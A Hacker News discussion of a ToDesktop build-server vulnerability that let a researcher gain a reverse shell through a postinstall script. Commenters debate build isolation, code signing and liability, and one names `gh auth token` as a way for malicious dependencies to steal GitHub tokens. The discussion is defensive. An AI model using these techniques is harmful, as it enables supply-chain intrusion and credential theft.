davej 5 hours ago

Dave here, founder of ToDesktop. I've shared a write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...

This vulnerability was genuinely embarrassing, and I'm sorry we let it happen. After thorough internal and third-party audits, we've fundamentally restructured our security practices to ensure this scenario can't recur. Full details are covered in the linked write-up. Special thanks to Eva for responsibly reporting this.

  • spudlyo 5 hours ago

    > cannot happen again.

    Hubris. Does not inspire confidence.

    > We resolved the vulnerability within 26 hours of its initial report, and additional security audits were completed by February 2025.

    After reading the vulnerability report, I am impressed at how quickly you guys jumped on the fix, so kudos. Did the security audit lead to any significant remediation work? If you weren't following PoLP, I wonder what else may have been overlooked?

    • davej 5 hours ago

      Fair point. Perhaps better phrased as "to ensure this scenario can't recur.". I'll edit my post.

      Yes, we re-architected our build container as part of remediation efforts, it was quite significant.

    • abhiaagarwal 4 hours ago

      Based on the claims on the blog, it feels reasonable to say that this "cannot" occur again.

    • TZubiri 30 minutes ago

      The only acceptable response is to resign with shame.

      I'm not gonna champion for this because it's not for me, it's for them, but they don't realize how much of a danger this is. How much of a fuck up. This isn't a slap on the wrist.

      If you have any pride, and you want a chance at doing quality software, the moment you get pwned like this, you resign, let the company die, and let someone else give it a shot.

      • braiamp 27 minutes ago

        This is the wrong response, because that means that the learning would be lost. The security community didn't want that to happen when one of the CA's got a vulnerability, we do not want it to happen to other companies. We want companies to succeed and get better, being shameful doesn't help towards that. Learning the right lessons does, and resigning means that you are learning the wrong ones.

        • TZubiri 18 minutes ago

          I don't think the lesson is lost. The opposite.

          If you get a slap on the wrist, do you learn? No, you play it down.

          However if a dev who gets caught doing a bad is forced to resign. Then all the rest of the devs doing the same thing will shape up.

          • otterley 10 minutes ago

            Under what theory of psychology are you operating? This is along the same lines as punishment is an effective deterrent of crime, which we know isn’t true from experience.

  • hakaneskici 4 hours ago

    How can -let's say- Cursor users be sure they were not compromised?

    > No malicious usage was detected

    Curious to hear about methods used if OK to share, something like STRIDE maybe?

    • Centigonal 2 hours ago

      from todesktop's report:

      > Completed a review of the logs. Confirming all identified activity was from the researcher (verified by IP Address and user agent).

      • hakaneskici 2 hours ago

        With privileged access, the attackers can tamper with the evidence for repudiation, so although I'd say "nothing in the logs" is acceptable, not everyone may. These two attack vectors are part of the STRIDE threat modeling approach.

        • morgante an hour ago

          They don’t elaborate on the logging details, but certainly must good systems don’t allow log tampering even for admins.

  • doctorpangloss an hour ago

    I don't know. On the one hand the Internet goes and lashes out at tiny companies run by ordinary people for things that kind of don't matter. The drama is always a bigger story than the consequences, or whatever.

    On the other hand, let's say this is really as big of a deal as the dramas make it out to be. Do we want a world where ordinary people can raise money? I do. The commenters who are sincere about these security dramas want VCs to only give money to two groups of people and never a small amount to ordinary people. Those groups are: the sons and daughters of important celebrities and business people, and the 12 kids who do Math 55 every year.

    Be careful what you wish for, Joe "Hacker" News.

  • edm0nd 5 hours ago

    how much of a bounty was paid to Eva for this finding?

    • richardboegli 4 hours ago

      > they were nice enough to compensate me for my efforts and were very nice in general.

      They were compensated, but doesn't elaborate.

      • jsheard 3 hours ago

        Sounds like it was handled better than the authors last article where the Arc browser company initially didn't offer any bounty for a similar RCE, then awarded a paltry $2k after getting roasted, and finally bumped it up to $20k after getting roasted even more.

  • TZubiri an hour ago

    Don't worry man, it's way more embarassing for the people that downloaded your dep or any upstream tool.

    If they didn't pay you a cent, you have no liability here.

    • remram 28 minutes ago

      This is not how the law works anywhere, thankfully.

      • TZubiri 16 minutes ago

        Well for one it was a gift so there is no valid contract right? There are no direct damages because there is nothing paid and nothing to refund. Wrt indirect damages, there's bound to be a disclaimer or two, at least at the app layer.

        IANAL, not legal advice

felixrieseberg 3 hours ago

As an Electron maintainer, I'll re-iterate a warning I've told many people before: Your auto-updater and the underlying code-signing and notarization mechanisms are sacred. The recovery mechanisms for the entire system are extremely painful and often require embarrassing emails to customers. A compromised code-sign certificate is close to the top of my personal nightmares.

Dave and toDesktop have build a product that serves many people really well, but I'd encourage everyone building desktop software (no matter how, with or without toDesktop!) to really understand everything involved in compiling, signing, and releasing your builds. In my projects, I often make an argument against too much abstraction and long dependency chain in those processes.

If you're an Electron developer (like the apps mentioned), I recommend:

* Build with Electron Forge, which is maintained by Electron and uses @electron/windows-sign and @electron/osx-sign directly. No magic.

* For Windows signing, use Azure Trusted Signing, which signs just-in-time. That's relatively new and offers some additional recovery mechanisms in the worst case.

* You probably want to rotate your certificates if you ever gave anyone else access.

* Lastly, you should probably be the only one with the keys to your update server.

  • TZubiri 28 minutes ago

    Question.

    I've noticed a lot of websites import from other sites, instead of local.

    <script src="scriptscdn.com/libv1.3">

    I almost never see a hash in there. Is this as dangerous as it looks, why don't people just use a hash?

    • bastawhiz 3 minutes ago

      1. Yes

      2. Because that requires you to know how to find the hash and add it.

      Truthfully the burden should be on the third party that's serving the script (where did you copy that HTML in the first place?) but they aren't incentivizes to have other sites use a hash.

  • paradite 2 hours ago

    Hi. I'm an electron app developer. I use electron builder paired with AWS S3 for auto update.

    I have always put Windows signing on hold due to the cost of commercial certificate.

    Is the Azure Trusted Signing significantly cheaper than obtaining a commercial certificate? Can I run it on my CI as part of my build pipeline?

    • felixrieseberg 2 hours ago

      Azure Trusted Signing is one of the best things Microsoft has done for app developers last year, I'm really happy with it. It's $9.99/month and open both to companies and individuals who can verify their identity (it used to only be companies). You really just call signtool.exe with a custom dll.

      I wrote @electron/windows-sign specifically to cover it: https://github.com/electron/windows-sign

      Reference implementation: https://github.com/felixrieseberg/windows95/blob/master/forg...

      • itsFolf 2 hours ago

        The big limitation with Azure Trusted Signing is that your organization needs to be at least 3 years old. Seems to be a weird case where developers that could benefit from this solution are pushed towards doing something else, with no big reason to switch back later.

      • paradite 2 hours ago

        Hi. This is very helpful. Thanks for sharing!

  • gamedever 2 hours ago

    And yet, tons of developers install github apps that ask for full permissions to control all repos and can therefore do to same things to every dev usings those services.

    github should be ashamed this possibility even exists and double ashamed that their permission system and UX is so poorly conceived that it leads apps to ask for all the permissions.

    IMO, github should spend significant effort so that the default is to present the user with a list of repos they want some github integration to have permissions for and then for each repo, the specific permissions needed. They should be designed that minimal permissions is encouraged.

    As it is, the path of least resistance for app devs is "give me root" and for users to say "ok, sure"

    • xmprt an hour ago

      I personally haven't worked with many of the github apps that you seem to refer to but the few that I've used are only limited to access the specific repositories that I give and within those repositories their access control is scoped as well. I figured this is all stuff that can be controlled on Github's side. Am I mistaken?

    • madeofpalk 2 hours ago

      Why spend that effort when any code you run on your machine (such as dependency post-install scripts, or the dependencies themselves!) can just run `gh auth token` can grab a token for all the code you push up.

      By design, the gh cli wants write access to everything on github you can access.

    • charrondev an hour ago

      I will note that at least for our GitHub enterprise setup permissions are all granular, tokens are managed by the org and require an approval process.

      I’m not sure how much of this is “standard” for an org though.

sky2224 2 hours ago

This is the second big attack found by this individual in what... 6 months? The previous exploit (which was in Arc browser), also leveraged a poorly configured firebase db: https://kibty.town/blog/arc/

So this is to say, at what point should we start pointing the finger at Google for allowing developers to shoot themselves in the foot so easily? Granted, I don't have much experience with firebase, but to me this just screams something about the configuration process is being improperly communicated or overall is just too convoluted as a whole.

  • 999900000999 2 hours ago

    Firebase let's anyone get started in 30 seconds.

    Details like proper usage, security, etc. Those are often overlooked. Google isn't to blame if you ship a paid product without running a security audit.

    I use firebase essentially for hobbyist projects for me and my friends.

    If I had to guess these issues come about because developers are rushing to market. Not Google's fault ... What works for a prototype isn't production ready.

  • nightpool 2 hours ago

    I don't think Firebase is really at fault here—the major issue they highlighted is that the deployment pipeline uploaded the compiled artifact to a shared bucket from a container that the user controlled. This doesn't have anything to do with firebase—it would have been just as impactful if the container building the code uploaded it to S3 from the buildbot.

mcoliver 3 hours ago

"i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload"

Just want to make sure I understand this. They made a hello world app and submitted it to todesktop with a post install script that opened a reverse shell on the todesktop build machine? Maybe I missed it but that shouldn't be possible. Build machine shouldn't have outbound open internet access right?? Didn't see that explained clearly but maybe I'm missing something or misunderstanding.

  • TheDong 3 hours ago

    In what world do you have a machine which downloads source code to build it, but doesn't have outbound internet access so it can't download source code or build dependencies?

    Like, effectively the "build machine" here is a locked down docker container that runs "git clone && npm build", right? How do you do either of those activities without outbound network access?

    And outbound network access is enough on its own to create a reverse shell, even without any open inbound ports.

    The miss here isn't that the build container had network access, it's that the build container both ran untrusted code, and had access to secrets.

    • arccy 3 hours ago

      It's common, doesn't mean it's secure. A lot of linux distros in their packaging will separate download (allows outbound to fetch dependencies), from build (no outside access).

      Unfortunately, in some ecosystems, even downloading packages using the native package managers is unsafe because of postinstall scripts or equivalent.

    • gtirloni 43 minutes ago

      In a world with an internal proxy/mirror for dependencies and no internet access allowed by build systems.

    • ndriscoll 2 hours ago

      Even if your builders are downloading dependencies on the fly, you can and should force that through an artifact repository (e.g. artifactory) you control. They shouldn't need arbitrary outbound Internet access. The builder needs a token injected with read-only pull permissions for a write-through cache and push permissions to the path it is currently building for. The only thing it needs to talk to is the artifactory instance.

    • fc417fc802 2 hours ago

      If you don't network isolate your build tooling then how do you have any confidence that your inputs are what you believe them to be? I run my build tools in a network namespace with no connection to the outside world. The dependencies are whatever I explicitly checked into the repo or otherwise placed within the directory tree.

      • TheDong 37 minutes ago

        You don't have any confidence beyond what lockfiles give you (which is to say the npm postinstall scripts could be very impure, non-hermetic, and output random strings). But if you require users to vendor all their dependencies, fully isolate all network traffic during build, be perfectly pure and reproducible and hermetic, presumably use nix/bazel/etc... well, you won't have any users.

        If you want a perfectly secure system with 0 users, it's pretty easy to build that.

    • mcoliver an hour ago

      There are plenty of worlds that take security more seriously and practice defense in depth. Your response could use a little less hubris and a more genuinely inquisitive tone. Looks like others have already chimed in here but to respond to your (what feels like sarcasm) questions:

      - You can have a submission process that accepts a package or downloads dependencies, and then passes it to another machine that is on an isolated network for code execution / build which then returns the built package and logs to the network facing machine for consumption.

      Now sure if your build machine is still exposing everything on it to the user supplied code (instead of sandboxing the actual npm build/make/etc.. command) you could insert malicious code that zips up the whole filesystem, env vars, etc.. and exfiltrates them through your built app in this case snagging the secrets.

      I don't disagree that the secrets on the build machine were the big miss, but I also think designing the build system differently could have helped.

      • TheDong 41 minutes ago

        You have to meet your users where they are. Your users are not using nix and bazel, they're using npm and typescript.

        If your users are using bazel, it's easy to separate "download" from "build", but if you're meeting your users over here where cows aren't spherical, you can't take security that seriously.

        Security doesn't help if all your users leave.

    • katbyte 3 hours ago

      you use a language where you have all your deps local to the repo? ie go vendor?

    • areyourllySorry 3 hours ago

      you can always limit said network access to npm.

      • TheDong 35 minutes ago

        You can't since a large number of npm post-install scripts also make random arbitrary network calls.

        This includes things like downloading and compiling pre-compiled binaries for the native architecture hosted on random servers.

        npm is really cool.

  • trallnag 3 hours ago

    Isn't it really common for build machines to have outbound internet access? Millions of developers use GitHub Actions for building artifacts and the public runners definitely have outbound internet access

    • tomjakubowski 2 hours ago

      Indeed, you can indeed punch out from an actions runner. Such a thing is probably against GitHub's ToS, but I've heard from my third cousin twice removed that his friend once ssh'ed out from an action to a bastion host, then used port forwarding to get herself a shell on the runner in order to debug a failing build.

      • gtirloni 37 minutes ago

        So this friend escaped from the ephemeral container VM into the build host which happened to have a private SSH on it that allowed it to connect to a bastion host to... go back to the build host and debug a failed build that should be self-contained inside the container VM which they already had access in the first place by the means of, you know, running a build on it? Interesting.

    • arccy 3 hours ago

      A few decades ago, it was also really common to smoke. Common != good, github actions isn't a true build tool, it's an arbitrary code runtime platform with a few triggers tied to your github.

    • selfhoster 2 hours ago

      It is and regardless a few other commenters saying or hinting it isn't...it is. An air gapped build machine wouldn't work for most software built today.

      • fc417fc802 an hour ago

        Strange. How do things like Nix work then? The nix builders are network isolated. Most (all?) Gentoo packages can also be built without network access. That seems like it should cover a decent proportion of modern software.

        Instances where an air gapped build machine doesn't work are examples of developer laziness, not bothering to properly document dependencies.

      • ok_dad an hour ago

        Sounds like a problem with modern software build practices to me.

asciii 4 hours ago

> i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload

From ToDesktop incident report,

> This leak occurred because the build container had broader permissions than necessary, allowing a postinstall script in an application's package.json to retrieve Firebase credentials. We have since changed our architecture so that this can not happen again, see the "Infrastructure and tooling" and "Access control and authentication" sections above for more information about our fixes.

I'm curious to know what the trial/error here was to get their machine to spit out the build or if it was in one-shot

GuestFAUniverse 4 hours ago

" please do not harass these companies or make it seem like it's their fault, it's not. it's todesktop's fault if anything) "

I don't get it. Why would it be "todesktop's fault", when all the mentioned companies allowed to push updates?

I had these kind of discussions with naive developers giving _full access_ to GitHub orgs to various 3rd party apps -- that's never right!

  • stefan_ 3 hours ago

    Yeah, it is their fault. I don't download "todesktop" (to-exploit), I download Cursor. Don't give 3rd parties push access to all your clients, that's crazy. How can this crappy startup build server sign a build for you? That's insane.

    • floydnoel 31 minutes ago

      it blows me away that this is even a product. it's like a half day of dev time, and they don’t appear to have over-engineered it or even done basic things given the exploit here.

luxurytent 2 hours ago

Love the blog aesthetic, and the same goes to all your friends (linked at the bottom).

  • throitallaway an hour ago

    The lack of capitalization made it difficult for me to quickly read sentences. I had to be much more intentful when scanning the text.

giantg2 4 hours ago

With rhe number of dependencies and dependency trees going multiple levels deep? Third party risk is the largely unaddressed elephant in the room that companies don't care about.

  • TZubiri 23 minutes ago

    I started to use

    -paid operating system (rhel) with a team of paid developers and maintainers verifying builds and dependencies.

    - empty dependencies. Only what the core language provides.

    It's not that great of a sacrifice. Like 20$/mo for the OS. And like 2 days of dev work which pays itself off in the long run by avoiding a mass of code you don't understand

vekatimest 3 hours ago

The cat is cute but I'd rather not have it running in front of the text while I'm trying to read and use my cursor.

  • gblargg 43 minutes ago

    I had to go back and enable JavaScript. Wow, is the goal to direct my attention away from reading the text?

    • carcabob 27 minutes ago

      Ironically, it actually helped me stay focused on the article. Kind of like a fidget toy. When part of my brain would get bored, I could just move the cat and satisfy that part of my brain while I keep reading.

      I know that sounds kind of sad that my brain can't focus that well (and it is), but I appreciated the cat.

  • internetter an hour ago

    Then just… put the cursor in the corner? The blog isn’t interactive or anything. I think the cat is cute.

  • ok_dad an hour ago

    Cats tend to do that.

aorloff 2 hours ago

I guess what I'm surprised at here is that a popular ? IDE would be delivered over a delivery platform like this (immature or not)

I would've expected IDE developers to "roll their own"

rvz 5 hours ago

My goodness. So much third-party risk upon risk and lots of external services opening up this massive attack surface and introducing this RCE vulnerability.

From an Electron bundler service, to sourcemap extraction and now an exposed package.json with the container keys to deploy any app update to anyone's machine.

This isn't the only one, the other day Claude CLI got a full source code leak via the same method from its sourcemaps being exposed.

But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.

  • gamedever 2 hours ago

    Blaming Js/Ts is ridiculous. All those same problems exist in all environments. Js/Ts is the biggest so it gets the most attention but if you think it's different in any other environment you're fooling yourself.

    • TZubiri 21 minutes ago

      Ecosystem, not the lang itself.

      It truly is a community issue, it's not a matter of the lang.

      You will never live down fucking left-pad

  • XorNot 4 hours ago

    > But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.

    You've always been able to do the first thing though: the only thing you can do is obfuscate the source map, but it's not like that's a substantial slowdown when you're hunting for authentication points (identify API URLs, work backwards).

    And things like credentials in package.json is just a sickness which is global to computing right now: we have so many ways you can deploy credentials, basically 0 common APIs which aren't globals (files or API keys) and even fewer security tools which acknowledge the real danger (protecting me from my computers system files is far less valuable then protecting me from code pretending to be me as my own user - where all the real valuable data already is).

    Basically I'm not convinced our security model has ever truly evolved beyond the 1970s where the danger was "you damage the expensive computer" rather then "the data on the computer is worth orders of magnitude more then the computer".

oguz-ismail 5 hours ago

[flagged]

  • spudlyo 5 hours ago

    Why does it use Neko the cursor chasing cat? Why the goth color scheme? These are stylistic choices, there is no explaining them.

    • nkrisc 5 hours ago

      Thankfully there is reader mode. That dumb cat is so obnoxious on mobile.

    • nickthegreek 5 hours ago

      woah, the cat chases your taps on mobile!

  • nickthegreek 5 hours ago

    it’s a blog. people regularly use their personal sites to write in a tone and format that they are fond of. i only normally feel like i see this style from people who were on the internet in the 90s. i’d imagine we would see it even more if phones and auto correct didn’t enforce a specific style. imagine being a slave to the shift key. it can’t even fight back! i’m more upset the urls aren’t actually clickable links.

  • QuadmasterXLII 4 hours ago

    Finding an RCE for every computer running cursor is cool, and typing in all lowercase isn’t that cool. Finding an RCE on millions of computers has much much higher thermal mass than typing quirks, so the blog post makes typing in all lowercase cool.

  • AndrewStephens 5 hours ago

    why do the stars shine? why does rain fall from the sky? using upper case is just a social convention - throw off your chains.

  • ge96 4 hours ago

    the cat chase cursor thing is great

  • edm0nd 5 hours ago

    its cool. not everything has to be typed in a "normal" way.

  • jpbastyr 5 hours ago

    just the style of their blog

orliesaurus 3 hours ago

ToDesktop vulnerability: not surprised. Trust broken.

noisy_boy 2 hours ago

Question/idea: can't GitHub use LLMs to periodically scan the code for vulnerabilities like this and inform the repo owner?

They can even charge for it ;)

  • TZubiri 20 minutes ago

    Problem: a tool built with LLMs for building LLMs with LLMs has a vuln

    Solution: more LLMs

    Snap out of it

TZubiri 34 minutes ago

I can't post things like "what a bunch of clowns" due to hacker news guidelines so let me go by another more productive route.

These people, the ones who install dependencies (that install dependencies)+, these people who write apps with AI, who in the previous season looped between executing their code and searching the error on stackoverflow.

Whether they work for a company or have their own startup, the moment that they start charging money, they need to be held liable when shit happens.

When they make their business model or employability advantage to take free code in the internet, add pumpkin spice and charge cash for it, they cross the line from pissing passionate hackers by defiling our craft, to dumping in the pool and ruining it for users and us.

It is not sufficient to write somewhere in a contract that something is as is and we hold harmless and this and that. Buddy if you download an ai tool to write an ai tool to write an ai tool and you decided to slap a password in there, you are playing with big guns, if it gets leaked, you are putting other services at risk, but let's call that a misdemeanor. Because we need to reserve something stronger for when your program fails silently, and someone paid you for it, and they relied on your program, and acted on it.

That's worse than a vulnerability, there is no shared responsibility, at least with a vuln, you can argue that it wasn't all your fault, someone else actively caused harm. Now are we to believe the greater risk of installing 19k dependencies and programming ai with ai is vulns? No! We have a certainty, not a risk, that they will fuck it up.

Eventually we should license the field, but for now, we gotta hold devs liable.

Give those of us who do 10 times less, but do it right, some kind of marketing advantages, it shouldn't be legal that they are competing with us. A vscode fork got how much in VC funding?

My brothers lets take arms and defend. And defend quality software I say. Fear not writing code, fear not writing raw html, fear not, for they don't feel fear so why should you?